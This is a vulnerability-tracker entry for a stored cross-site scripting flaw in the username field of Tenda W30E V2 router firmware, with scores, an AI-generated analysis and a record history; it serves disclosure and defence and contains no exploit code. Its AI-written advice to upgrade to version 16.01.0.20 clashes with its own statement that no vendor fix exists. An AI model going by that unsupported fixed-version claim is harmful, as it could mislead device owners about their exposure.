Description
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain a stored cross-site scripting vulnerability in the user creation functionality. Insufficient input validation allows attacker-controlled script content to be stored and later executed when administrative users access the affected management pages.
Published: 2026-01-26
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting in Admin Interface
Action: Apply Patch
AI Analysis

Impact

A stored cross‑site scripting vulnerability exists in the user creation functionality of the Tenda W30E V2 firmware. Insufficient input validation allows an attacker to inject malicious script into the username field, which is then saved and executed when an administrative user views the affected management page. This weakness falls under CWE-79 and can enable the execution of arbitrary JavaScript in the context of a privileged admin session, potentially leading to session hijacking, defacement, or other client‑side compromises.

Affected Systems

The vulnerability affects Shenzhen Tenda Technology Co., Ltd. W30E V2 devices running firmware versions up to and including V16.01.0.19(5037). All affected units employ the same username assignment logic and share the same management interface where the injection is stored and later rendered.

Risk and Exploitability

The CVSS base score of 5.1 reflects a moderate severity due to the limited scope to administrators with access to the web interface. The EPSS score of less than 1% indicates a low probability of exploitation in the wild, and the vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities catalog. Attackers must supply a crafted username and rely on an admin to view the page for exploitation. While the risk is comparatively low, the potential impact on privileged users warrants timely remediation.

Generated by OpenCVE AI on April 16, 2026 at 17:40 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the device to the latest firmware release that removes the stored XSS weakness, such as version 16.01.0.20 or newer.
  • If an upgrade is not immediately available, restrict the username input field to allow only alphanumeric characters or otherwise sanitize all submitted data before storage.
  • Limit administrative access to the management interface by binding it to a secured VLAN or firewall rule and enforce two‑factor authentication to reduce the likelihood that an attacker can reach the vulnerable functionality.

Generated by OpenCVE AI on April 16, 2026 at 17:40 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 28 Jan 2026 20:15:00 +0000

Type Values Removed Values Added
First Time appeared Tenda w30e Firmware
CPEs cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*
cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*
Vendors & Products Tenda w30e Firmware
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Tue, 27 Jan 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Tenda
Tenda w30e
Vendors & Products Tenda
Tenda w30e

Mon, 26 Jan 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 26 Jan 2026 18:00:00 +0000

Type Values Removed Values Added
Description Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain a stored cross-site scripting vulnerability in the user creation functionality. Insufficient input validation allows attacker-controlled script content to be stored and later executed when administrative users access the affected management pages.
Title Tenda W30E V2 Stored XSS via Username Field
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N'}

Subscriptions

Tenda W30e W30e Firmware
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-03-05T01:30:34.765Z

Reserved: 2026-01-22T20:23:19.803Z

Link: CVE-2026-24433

cve-icon Vulnrichment

Updated: 2026-01-26T21:08:19.927Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-26T18:16:40.873

Modified: 2026-01-28T20:10:23.400

Link: CVE-2026-24433

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T17:45:27Z

Weaknesses